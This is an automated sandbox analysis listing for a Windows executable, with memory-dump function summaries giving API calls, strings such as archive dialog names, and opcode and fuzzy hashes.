• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
• API String ID: 2092733347-0
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: _memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 2931989736-0
                                                                                      • Opcode ID: b3d359851e2b7ccf18627faf8282b1a013a4c9f8e4f948fab76b21705fb7a3be
                                                                                      • Instruction ID: d12e228a9d4532de92bfa38e0de6d1cdf3e670c2c234c60ffc106194ee3c669a
                                                                                      • Opcode Fuzzy Hash: b3d359851e2b7ccf18627faf8282b1a013a4c9f8e4f948fab76b21705fb7a3be
                                                                                      • Instruction Fuzzy Hash: 7B21B27664050ABFD7447B10CC81F3B77ACEF547A8B184628FC489A102F670DD456BB4
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D7FB07
                                                                                      • EnterCriticalSection.KERNEL32(00DB1E74,00000000,?,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?,?,?,00D83AFF,?), ref: 00D7FB15
                                                                                      • new.LIBCMT ref: 00D7FB35
                                                                                      • new.LIBCMT ref: 00D7FB6B
                                                                                      • LeaveCriticalSection.KERNEL32(00DB1E74,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?,?,?,00D83AFF,?,00008000,?), ref: 00D7FB8B
                                                                                      • LeaveCriticalSection.KERNEL32(00DB1E74,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?,?,?,00D83AFF,?,00008000,?), ref: 00D7FB96
                                                                                        • Part of subcall function 00D7F930: InitializeCriticalSection.KERNEL32(000001A0,00DB1E74,00000000,?,?,00D7FB88,00000020,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?), ref: 00D7F969
                                                                                        • Part of subcall function 00D7F930: CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?,?,?,00D83AFF), ref: 00D7F973
                                                                                        • Part of subcall function 00D7F930: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?,?,?,00D83AFF), ref: 00D7F983
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CreateLeave$EnterEventH_prologInitializeSemaphore
                                                                                      • String ID:
                                                                                      • API String ID: 3919453512-0
                                                                                      • Opcode ID: 9d7991a53a1d37ce34c989ff65ee1cdec3123cf0a4c92945f81678fcb3947afe
                                                                                      • Instruction ID: 187dde7c7c497481a34402f8fc546017afc3a21202e69d4da61ecfcdb3f1b2f3
                                                                                      • Opcode Fuzzy Hash: 9d7991a53a1d37ce34c989ff65ee1cdec3123cf0a4c92945f81678fcb3947afe
                                                                                      • Instruction Fuzzy Hash: 79118234A00311EBD724AB68EC65BBD7AB8EB89750F00423AF819D73D0EB70C8008B70
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,00DACBE8,00D92674,00DACBE8,?,?,00D92213,?,?,00DACBE8), ref: 00D96323
                                                                                      • _free.LIBCMT ref: 00D96356
                                                                                      • _free.LIBCMT ref: 00D9637E
                                                                                      • SetLastError.KERNEL32(00000000,?,00DACBE8), ref: 00D9638B
                                                                                      • SetLastError.KERNEL32(00000000,?,00DACBE8), ref: 00D96397
                                                                                      • _abort.LIBCMT ref: 00D9639D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                      • String ID:
                                                                                      • API String ID: 3160817290-0
                                                                                      • Opcode ID: 6bf507e04e04f28fa68373302d23bb21bb857d0b0a4d16dc3228e881f320ae3a
                                                                                      • Instruction ID: 78479f9114f207c7bd4fa9c16e192485b0615d31e64779c315463f76bc27419c
                                                                                      • Opcode Fuzzy Hash: 6bf507e04e04f28fa68373302d23bb21bb857d0b0a4d16dc3228e881f320ae3a
                                                                                      • Instruction Fuzzy Hash: F1F0AF36605B006ADF123B687D4AB1A2629DBC27B1B2D4224F528E2295EF31DC028779
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,F5E85006,00D92794,00000000,00000000,00D92FC2,?,00D92FC2,?,00000001,00D92794,F5E85006,00000001,00D92FC2,00D92FC2), ref: 00D99440
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D994C9
                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00D994DB
                                                                                      • __freea.LIBCMT ref: 00D994E4
                                                                                        • Part of subcall function 00D959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D923AA,?,0000015D,?,?,?,?,00D92F29,000000FF,00000000,?,?), ref: 00D95A2E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                      • String ID: d0F
                                                                                      • API String ID: 2652629310-1238022483
                                                                                      • Opcode ID: 1db540438e1c08e71fd0324476b1e5e0fbfe811ce14633ebf173cd318f698c9c
                                                                                      • Instruction ID: 0471f92e5b9d3c9dfb25cd9a82804782d52eb6036961d0c755a59ba32e289f71
                                                                                      • Opcode Fuzzy Hash: 1db540438e1c08e71fd0324476b1e5e0fbfe811ce14633ebf173cd318f698c9c
                                                                                      • Instruction Fuzzy Hash: DD318E72A0020AABDF269F68DC55EAEBBA5EB40710F19422CFC05D6290E735CD51CBB4
                                                                                      APIs
                                                                                        • Part of subcall function 00D712E7: GetDlgItem.USER32(00000000,00003021), ref: 00D7132B
                                                                                        • Part of subcall function 00D712E7: SetWindowTextW.USER32(00000000,00DA02E4), ref: 00D71341
                                                                                      • EndDialog.USER32(?,00000001), ref: 00D8B86B
                                                                                      • GetDlgItemTextW.USER32(?,00000066,00000800), ref: 00D8B881
                                                                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00D8B89B
                                                                                      • SetDlgItemTextW.USER32(?,00000066), ref: 00D8B8A6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemText$DialogWindow
                                                                                      • String ID: RENAMEDLG
                                                                                      • API String ID: 445417207-3299779563
                                                                                      • Opcode ID: fc4a0a0c062bf0c5b9804734fcf11e6f673b1e9e8a8ee16c5fdd9a3425b1a7a9
                                                                                      • Instruction ID: 80262d00f731a6ca1057817346c2ee58eedec5f5758977db99e501eaace171b9
                                                                                      • Opcode Fuzzy Hash: fc4a0a0c062bf0c5b9804734fcf11e6f673b1e9e8a8ee16c5fdd9a3425b1a7a9
                                                                                      • Instruction Fuzzy Hash: 4001F533A403167AD2116EA9AE49F377B7CEB86B61F040517F240F21A0C766A804EB72
                                                                                      APIs
                                                                                        • Part of subcall function 00D7F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D7F324
                                                                                        • Part of subcall function 00D7F309: LoadLibraryW.KERNELBASE(?,?,00D7DEC8,Crypt32.dll,?,00D7DF4A,?,00D7DF2E,?,?,?,?), ref: 00D7F346
                                                                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D7DED4
                                                                                      • GetProcAddress.KERNEL32(00DB1E58,CryptUnprotectMemory), ref: 00D7DEE4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                      • API String ID: 2141747552-1753850145
                                                                                      • Opcode ID: 3ad0b708b6d0be73008e5476098616e43a2e52f3b00a160070d4bf00575bbfa8
                                                                                      • Instruction ID: 3a9d0f7272f6e447539272bd301710cb76bedc211e50f4bd57833160902cba57
                                                                                      • Opcode Fuzzy Hash: 3ad0b708b6d0be73008e5476098616e43a2e52f3b00a160070d4bf00575bbfa8
                                                                                      • Instruction Fuzzy Hash: 0CE046B0500743AFDB415B75A808B0AFFA5BFA2714F18C52AF058C2640EBB4E0A88B74
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00D989B8
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D989DB
                                                                                        • Part of subcall function 00D959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D923AA,?,0000015D,?,?,?,?,00D92F29,000000FF,00000000,?,?), ref: 00D95A2E
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D98A01
                                                                                      • _free.LIBCMT ref: 00D98A14
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D98A23
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                      • String ID:
                                                                                      • API String ID: 336800556-0
                                                                                      • Opcode ID: 42caf953f59dfb2609e1e0d74eda342db18a690cc8d3cc9fbff9a5e9293d7807
                                                                                      • Instruction ID: b492cc35206cd93dc14ff3c3849f4d6e8f0c6a7df2ef543a7d66ab4f93d6faef
                                                                                      • Opcode Fuzzy Hash: 42caf953f59dfb2609e1e0d74eda342db18a690cc8d3cc9fbff9a5e9293d7807
                                                                                      • Instruction Fuzzy Hash: B90184726017157B2B2156BAAC8CC7B6D6DDAC7FA1318012AFD04D3245EE64CC01A6B1
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,?,00D95E43,00D95ADF,?,00D9634D,00000001,00000364,?,00D92213,?,?,00DACBE8), ref: 00D963A8
                                                                                      • _free.LIBCMT ref: 00D963DD
                                                                                      • _free.LIBCMT ref: 00D96404
                                                                                      • SetLastError.KERNEL32(00000000,?,00DACBE8), ref: 00D96411
                                                                                      • SetLastError.KERNEL32(00000000,?,00DACBE8), ref: 00D9641A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free
                                                                                      • String ID:
                                                                                      • API String ID: 3170660625-0
                                                                                      • Opcode ID: 059f2b2ebd6ce84d3974348edd13e6f6905c715d24468b3ef28eb1ee840024f0
                                                                                      • Instruction ID: 9153f96f14b75714161b1ce16f1cac799047e14c4ad440c36501be61317cb7b8
                                                                                      • Opcode Fuzzy Hash: 059f2b2ebd6ce84d3974348edd13e6f6905c715d24468b3ef28eb1ee840024f0
                                                                                      • Instruction Fuzzy Hash: C801D1763497006B9F022B686C89B1A2A29DBD27717294238F424E2282EF35CC014374
APIs
• _free.LIBCMT ref: 00D99282
  • Part of subcall function 00D959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?), ref: 00D959D8
  • Part of subcall function 00D959C2: GetLastError.KERNEL32(?,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?,?), ref: 00D959EA
• _free.LIBCMT ref: 00D99294
• _free.LIBCMT ref: 00D992A6
• _free.LIBCMT ref: 00D992B8
• _free.LIBCMT ref: 00D992CA
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• _free.LIBCMT ref: 00D9555D
  • Part of subcall function 00D959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?), ref: 00D959D8
  • Part of subcall function 00D959C2: GetLastError.KERNEL32(?,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?,?), ref: 00D959EA
• _free.LIBCMT ref: 00D9556F
• _free.LIBCMT ref: 00D95582
• _free.LIBCMT ref: 00D95593
• _free.LIBCMT ref: 00D955A4
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
Strings
Similarity
• API ID:
• String ID: d0F
• API String ID: 0-1238022483
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe,00000104), ref: 00D94C1A
• _free.LIBCMT ref: 00D94CE5
• _free.LIBCMT ref: 00D94CEF
Strings
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
• API String ID: 2506810119-1612741795
APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,00000000,00000000,?,?,00D9CD2F,00000000,00000000,00000000), ref: 00D9CA83
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00D9CD2F,00000000,00000000,00000000,00000000,00000000,00D92C4E,00000000,00D92C4E,00DA81D8), ref: 00D9CAB1
• GetLastError.KERNEL32(?,00D9CD2F,00000000,00000000,00000000,00000000,00000000,00D92C4E,00000000,00D92C4E,00DA81D8,00000010,00D9B747,00000000,00DA8150,00000010), ref: 00D9CAE2
Strings
Similarity
• API ID: ByteCharErrorFileLastMultiWideWrite
• String ID: d0F
• API String ID: 2456169464-1238022483
APIs
• __EH_prolog.LIBCMT ref: 00D77468
  • Part of subcall function 00D73AA3: __EH_prolog.LIBCMT ref: 00D73AA8
• GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000), ref: 00D7752E
  • Part of subcall function 00D77A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D77AAC
  • Part of subcall function 00D77A9D: GetLastError.KERNEL32 ref: 00D77AF2
  • Part of subcall function 00D77A9D: CloseHandle.KERNEL32(?), ref: 00D77B01
Strings
Similarity
• API ID: ErrorH_prologLast$CloseCurrentHandleProcess
• String ID: SeRestorePrivilege$SeSecurityPrivilege
• API String ID: 3813983858-639343689
APIs
• CharUpperW.USER32(?,?,?,?,00001000), ref: 00D8A92C
• CharUpperW.USER32(?,?,?,?,?,00001000), ref: 00D8A953
Strings
Similarity
• API ID: CharUpper
• String ID: -
• API String ID: 9403516-2547889144
APIs
  • Part of subcall function 00D712E7: GetDlgItem.USER32(00000000,00003021), ref: 00D7132B
  • Part of subcall function 00D712E7: SetWindowTextW.USER32(00000000,00DA02E4), ref: 00D71341
• EndDialog.USER32(?,00000001), ref: 00D891AB
• GetDlgItemTextW.USER32(?,00000065,00000000,?), ref: 00D891C0
• SetDlgItemTextW.USER32(?,00000065,?), ref: 00D891D5
Strings
Similarity
• API ID: ItemText$DialogWindow
• String ID: ASKNEXTVOL
• API String ID: 445417207-3402441367
APIs
  • Part of subcall function 00D712E7: GetDlgItem.USER32(00000000,00003021), ref: 00D7132B
  • Part of subcall function 00D712E7: SetWindowTextW.USER32(00000000,00DA02E4), ref: 00D71341
• EndDialog.USER32(?,00000001), ref: 00D89694
• GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 00D896AC
• SetDlgItemTextW.USER32(?,00000066,?), ref: 00D896DA
Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: ItemText$DialogWindow
• String ID: GETPASSWORD1
• API String ID: 445417207-3292211884
• Opcode ID: 3c8cad495726f7ccde9d6d72ca2791634e155df9caf658ed71c829188e9d8b79
• Instruction ID: 5cdb1ba89fc0e7cc75d758f2a321248ebc4aa03b3021298982d253395fdd257c
• Opcode Fuzzy Hash: 3c8cad495726f7ccde9d6d72ca2791634e155df9caf658ed71c829188e9d8b79
• Instruction Fuzzy Hash: 4611083250021977DB21AE789D5AFFAB76CEF0A740F180110FA89F3580E2A5DD04D7B1
APIs
• _swprintf.LIBCMT ref: 00D7B127
  • Part of subcall function 00D73F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D73F6E
• _wcschr.LIBVCRUNTIME ref: 00D7B145
• _wcschr.LIBVCRUNTIME ref: 00D7B155
Strings
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
Similarity
• API ID: _wcschr$__vswprintf_c_l_swprintf
• String ID: %c:\
• API String ID: 525462905-3142399695
• Opcode ID: 259fb21e6715b8980a1093453a13688a0eb44b65ee8fcdb0499914752259d44c
• Instruction ID: 1a200a5249ad3a50b1eb4eb2a8b0266c96ec51b3309318b9b707f7082e6882fa
• Opcode Fuzzy Hash: 259fb21e6715b8980a1093453a13688a0eb44b65ee8fcdb0499914752259d44c
• Instruction Fuzzy Hash: 3501925750472179DB20AB659C86E6BB7ACEE963B0B94841BFC8CD6081FB20D850C2B1
APIs
• InitializeCriticalSection.KERNEL32(000001A0,00DB1E74,00000000,?,?,00D7FB88,00000020,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?), ref: 00D7F969
• CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?,?,?,00D83AFF), ref: 00D7F973
• CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?,?,?,00D83AFF), ref: 00D7F983
Strings
• Thread pool initialization failed., xrefs: 00D7F99B
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
Similarity
• API ID: Create$CriticalEventInitializeSectionSemaphore
• String ID: Thread pool initialization failed.
• API String ID: 3340455307-2182114853
• Opcode ID: b3b6310595d601da2418f4849ea3dfef6e57b678849b6705a3156128fa522365
• Instruction ID: 7abc40b41045750a779e47b8351e460f06d9ff584b494538819c3f69ed6a480a
• Opcode Fuzzy Hash: b3b6310595d601da2418f4849ea3dfef6e57b678849b6705a3156128fa522365
• Instruction Fuzzy Hash: 96112EB1600705AFD3305F659885AABFBECEB56355F14882EE2DEC3240EB716840CB70
Strings
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
Similarity
• API ID:
• String ID: RENAMEDLG$REPLACEFILEDLG
• API String ID: 0-56093855
• Opcode ID: 82865eb3c93942cda9bab49339d65e980b7c8830f4bea4fb2ecdbab31bcf53ac
• Instruction ID: b0a23fd19effccfb2dc1957795d0d96e25019c6e65ad39c678becbc149fb6624
• Opcode Fuzzy Hash: 82865eb3c93942cda9bab49339d65e980b7c8830f4bea4fb2ecdbab31bcf53ac
• Instruction Fuzzy Hash: 8D015E76609306EFC701AB58EC40E36BBE9EB4A7A4F040627E691D2330D3329805EF71
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 00D7CE57
• FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00D7CE66
Strings
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
Similarity
• API ID: FindHandleModuleResource
• String ID: LTR$RTL
• API String ID: 3537982541-719208805
• Opcode ID: 0d6b3e30a8b53c7f0effa7625f66a7bccbe54f35494056132ae470e445a138e0
• Instruction ID: 4144e7d181f5397f7b0def25fedb555a04ddedee84eebe20c74d41183dec7a14
• Opcode Fuzzy Hash: 0d6b3e30a8b53c7f0effa7625f66a7bccbe54f35494056132ae470e445a138e0
• Instruction Fuzzy Hash: 79F02B316143146BE72456755C0AF6B3BACE786710F04825DF649C61C0EBA5990887F5
APIs
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
• Instruction ID: ed7049e60c3188789c704e7a924993d60268f56fdfc6b1f386d06ad79f0a1e68
